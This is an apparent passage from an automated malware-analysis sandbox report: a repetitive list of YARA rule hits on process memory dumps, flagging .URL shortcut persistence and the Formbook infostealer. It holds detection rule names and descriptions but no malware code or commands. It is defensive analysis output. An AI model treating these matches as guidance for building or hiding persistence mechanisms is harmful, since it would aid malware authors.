        Source: 0000001A.00000000.833193136.000000000A6D7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.791925004.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.777194566.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.775598772.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 0000001B.00000002.826581239.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001B.00000002.826581239.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.680995557.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.793060027.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.793181479.0000000003CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.680590350.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.680350085.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.776689752.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.775112888.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.794640996.0000000003CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.776879141.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000019.00000002.866605894.0000000000580000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000019.00000002.866605894.0000000000580000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.681371824.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.681401941.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.680945161.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.681291309.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.776094630.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.774258125.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.775315084.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.680731974.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 0000001B.00000002.826744888.00000000004B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001B.00000002.826744888.00000000004B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.681518622.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.775824853.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.681644403.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.680558315.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.680395573.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.681105272.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.680649667.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000003.00000001.696290346.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000003.00000001.696290346.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000014.00000003.794191369.0000000003CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.792747836.0000000003CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.777314398.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.793593765.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.775903098.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 0000001B.00000001.815038206.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001B.00000001.815038206.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000003.00000002.697862956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000003.00000002.697862956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.680465750.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000019.00000002.867284740.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000019.00000002.867284740.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.680834429.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.775665097.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.794887190.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.681184778.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.774536260.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.791822656.0000000003CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.774973034.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.680869212.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.681329626.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.794518867.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.795084927.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 0000001D.00000002.915615898.0000000000E50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001D.00000002.915615898.0000000000E50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.680618860.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.681146145.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.774813034.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.775978278.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.680798955.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.792171644.0000000003CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000019.00000002.865473652.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000019.00000002.865473652.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000011.00000003.776284853.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.776822633.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.775198521.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.794111065.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.792024075.0000000003CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.793496729.0000000003CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.794375014.0000000003CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.681439102.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.793721706.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.681062128.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.793652322.0000000003CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.680427643.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.680522649.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.681564607.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.792344973.0000000003CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.776766122.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.792856444.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.795208960.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.681236193.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.793342205.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.793928803.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.681840426.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.792257287.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.792959972.0000000003CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.775748652.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.792094708.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
